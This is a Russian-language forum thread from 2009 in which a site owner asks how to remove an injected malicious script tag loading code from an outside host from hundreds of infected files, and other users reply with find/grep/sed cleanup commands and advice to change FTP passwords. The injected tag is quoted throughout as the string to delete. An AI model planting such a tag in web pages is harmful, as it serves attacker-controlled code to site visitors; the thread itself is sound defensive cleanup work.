Как почистить вирусную строку?

Тема в разделе "Администрирование серверов", создана пользователем sllimm, 10 май 2009.

Статус темы:
Закрыта.
Модераторы: mefish, stooper
  1. sllimm

    sllimm Создатель

    Регистр.:
    10 авг 2008
    Сообщения:
    24
    Симпатии:
    0
    Как найти в файлах строку например <script src=http://lomko.biz/1.txt></script> и удалить её не повредив файл?
    Вся эта ерись на ВДСке.
    Знатоки, помогите!
     
  2. lex2d

    lex2d

    Регистр.:
    12 май 2008
    Сообщения:
    613
    Симпатии:
    104
    У меня ещё вопрос

    А как найти вирусные строки в DLE ,у меня сайт заразился iframe.
     
  3. sllimm

    sllimm Создатель

    Регистр.:
    10 авг 2008
    Сообщения:
    24
    Симпатии:
    0
    Проверь index и main файлы, скорей всего там и удали. Если один сайт, то руками можно.
     
  4. Александр1

    Александр1 Создатель

    Регистр.:
    30 апр 2009
    Сообщения:
    16
    Симпатии:
    0
    Смотрите файлы шаблона DLE
     
  5. Rem

    Rem

    Регистр.:
    22 сен 2006
    Сообщения:
    472
    Симпатии:
    41
    Как вариант можно сделать так


    Код:
    Создаешь файл в домашней директории, допустим fix.sh, с таким содержимым:
    #!/bin/sh
    
    for f in `find . -type f -exec egrep -q lomko.biz {} \; -print`; do
        echo $f
        sed -i "" -e "s|<script src=http://lomko.biz/1.txt></script>||g" $f
    done
    
    Делаешь его исполняемым:
    chmod +x fix.sh
    И в домашней директории по ссш запускаешь на исполнение этот файл:
    ./fix.sh
    
    Эта хрень уберет все вхождения по всему вашему аккаунту, даже в себе
    между палками: "s|<script src=http://lomko.biz/1.txt></script>||"
    Только сделай сначала резервную копию всех файлов, а то мало ли что :)
     
    sllimm нравится это.
  6. sllimm

    sllimm Создатель

    Регистр.:
    10 авг 2008
    Сообщения:
    24
    Симпатии:
    0
    Т.е. удалиться только данный текст, а все остальное в файле останется?

    #!/bin/sh

    for f in `find . -type f -exec egrep -q адрес сайта {} \; -print`; do
    echo $f
    sed -i "" -e "s|<<script src=http://lomko.biz/1.txt></script>>||g" $f
    done

    Пришет egrep: ЯЮИРЮ: No such file or directory
     
  7. Rem

    Rem

    Регистр.:
    22 сен 2006
    Сообщения:
    472
    Симпатии:
    41
    Я подправил код под твой вариант

    Да, только на всякий случай сделай сначала резервную копию всех файлов
     
  8. sllimm

    sllimm Создатель

    Регистр.:
    10 авг 2008
    Сообщения:
    24
    Симпатии:
    0
    Запускаю и ничего на экране не происходит. Просто висит и все.
     
  9. heavydude

    heavydude Постоялец

    Регистр.:
    6 окт 2007
    Сообщения:
    78
    Симпатии:
    20
    Ну я когда иногда случается - тупо

    grep -R '<script src=http://lomko.biz/1.txt></script>' * из папки /home


    Вылазит с 10-к файлов, vi их и все - минут 10 занимает

    Самое главное - потом пароли на ФТП сменить потому что прилепится сново дня через 2-3
     
  10. sllimm

    sllimm Создатель

    Регистр.:
    10 авг 2008
    Сообщения:
    24
    Симпатии:
    0
    Можно рабочую строку, чего там VI?
    У меня заражено штук 500 файлов.
     
Статус темы:
Закрыта.